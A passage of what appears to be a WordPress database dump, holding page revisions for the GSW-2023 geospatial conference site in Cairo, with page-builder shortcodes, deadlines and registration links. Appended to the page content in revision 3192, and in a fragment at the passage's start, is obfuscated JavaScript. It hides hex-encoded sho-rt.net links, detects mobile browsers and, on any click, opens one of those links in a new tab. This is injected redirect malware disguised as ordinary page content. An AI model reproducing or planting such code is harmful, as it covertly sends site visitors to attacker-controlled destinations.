_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 18:30:23','2022-11-09 18:30:23','',3066,'https://gsw2023.com/?p=3190',0,'revision','',0),
(3192,1,'2022-11-09 18:36:36','2022-11-09 18:36:36','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 18:36:36','2022-11-09 18:36:36','',3066,'https://gsw2023.com/?p=3192',0,'revision','',0),
(3193,1,'2022-11-09 18:40:34','2022-11-09 18:40:34','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" 